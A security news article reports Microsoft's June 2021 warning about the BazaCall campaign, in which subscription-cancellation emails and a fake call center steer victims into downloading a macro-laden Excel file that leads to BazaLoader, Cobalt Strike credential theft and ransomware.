Microsoft is tracking a new method of deploying malware involving a human-operated attack that first uses email to urge victims to call a number and then be directed to download a malicious Excel file off of a website.
The Microsoft Security Intelligence Twitter account on Tuesday published what it knows about an active BazaCall malware campaign that uses emails to trick victims into calling a number to cancel their supposed subscription to a service.
We’re tracking an active BazaCall malware campaign leading to human-operated attacks and ransomware deployment. BazaCall campaigns use emails that lure recipients to call a number to cancel their supposed subscription to a certain service. pic.twitter.com/RS5wGSndhv
— Microsoft Security Intelligence (@MsftSecIntel) June 22, 2021
Examples posted on Twitter include a fraudulent photo editing services for $59.99 per month and a cooking service for $29.999 per month.
When victims call that number, which is essentially a fake call center, they are directed to visit a website and download an Excel file to cancel the service, but that file contains a malicious macro that downloads the payload, according to Microsoft.
The campaign is named after BazaLoader, the malware it initially distributed, according to Microsoft, which says it observed the attacker using Cobalt Strike to steal credentials – including the Active Directory database – and exfiltrate data using rclone.
The lack of malicious elements in the emails make this particular campaign hard to detect, the company says.
“The lack of malicious elements in the emails can be a challenge for detection,” the company tweeted from its Security Intelligence account. “Microsoft 365 Defender’s cross-domain visibility allows endpoint signals to inform Microsoft Defender for Office 365 protections against the emails, ensuring comprehensive defense against this attack.”
Microsoft also tweeted a link to a Github page that includes advanced hunting queries to help IT teams locate this threat to stop it in its early stages.
This kind of attack method seems simple and thus easy to prevent, but as Microsoft pointed out, the lack of actual malicious elements in the email can make this hard to detect. Further, with employees working at home on work-issued devices, they’re more apt to call to cancel a service and perform those tasks on the work device.
If you enjoyed this article and want to receive more valuable industry content like this, click here to sign up for our digital newsletters!
Leave a Reply